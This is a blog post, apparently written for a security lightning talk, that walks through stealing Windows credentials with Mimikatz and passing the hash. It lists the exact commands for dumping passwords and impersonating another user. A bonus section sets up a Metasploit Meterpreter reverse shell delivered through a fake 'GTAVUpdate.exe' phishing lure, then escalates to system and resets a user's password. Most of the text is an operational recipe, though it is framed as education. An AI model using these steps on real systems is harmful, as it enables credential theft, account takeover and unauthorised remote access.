Passing the Hash with Mimikatz

Published on 07 Apr 2022

In this article, I'll walk you through how to use Mimikatz to obtain user passwords from a Windows machine. I'll also show you how to use Mimikatz to perform an attack called passing the hash (PtH) to escalate your privileges and impersonate another user. As a bonus, I'll show you how to combine a Meterpreter reverse shell with a phishing attack to get the same outcome without needing physical access to the target's machine.

What will you learn?

  • Mimikatz: a tool well known for extracting plaintext passwords and hashes from memory.
  • Metasploit: the world's most used penetration testing framework.
  • Kali Linux: a Linux distribution designed for digital forensics and penetration testing.

Pre-Setup

  • A target (preferably with consent)
  • A Windows machine with multiple user accounts (preferably one of which has admin access)
  • Windows Defender (aka the Windows firewall) turned off
  • Mimikatz (and Metasploit if you are attempting the bonus feature) downloaded

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */

The Simple Way

  1. Log on as FakeUser and demonstrate that without system admin privileges, we can't change the password of another account.
  2. Launch Mimikatz as an administrator.
  3. Use the command privilege::debug to escalate privileges.
  4. Use the command sekurlsa::logonpasswords to dump all user passwords.
  5. Get the hash of the user we want to impersonate (in this case, it's User) and the domain of the FakeUser account.
  6. Use the command:
     sekurlsa::pth /user:User /domain:[insert_user_domain_here] /ntlm:[insert_hash_here]
  7. A new console opens up.
  8. Demonstrate that the system thinks we are still FakeUser, but we are definitely User.
  9. Now try changing the password and it will work.

This is a pre-recording I did in case the lightning talk went sideways. If you can't view the recording below, use this link instead: Mimikatz Video

Bonus: The Fancy Way

  1. Launch Kali.
  2. Open a terminal and get the IP address using ip addr.
  3. Launch Metasploit using msfconsole.
  4. Use the commands:
     use multi/handler
     set payload windows/meterpreter/reverse_tcp
     set LHOST [IP address]
     set LPORT 4444
  5. Open another console and cd /var/www/html.
  6. Start the Apache server using service apache2 start.
  7. Switch back to the Meterpreter console and type exploit.
  8. Switch over to the Windows machine and talk about how simple social engineering can be used to gain access.
  9. Once GTAVUpdate.exe has been launched, go back to Kali.
  10. Show that we are now impersonating this user with getuid.
  11. Escalate our privileges with getsystem.
  12. Show that we are now system admin with getuid.
  13. Load Mimikatz using load mimikatz.
  14. Show that we can get the users' NTLM password hashes using lsa_dump_sam.
  15. Type in shell.
  16. This launches a shell, and we can verify that we are system admin with whoami.
  17. Change the password using net user User hello.

Reflection

From researching various topics about Mimikatz, passing the hash and Windows Defender to ultimately doing a lightning talk (more like a lightning demo) about how to escalate privileges in Windows, I've learnt a lot about how powerful a tool Windows firewall is for detecting malware like Mimikatz, and how easy it is to hack someone's account when you have physical access (i.e. GAME OVER!!!). The talk I did also spawned a couple of interesting questions about the validity of attacking a corporate network the way I demonstrated it. Spoiler alert: unless you have physical access to the network, the chances of you pulling this off are low. Even if you successfully manage to download Mimikatz, there are definitely going to be all sorts of red flags going off in the company's IT department.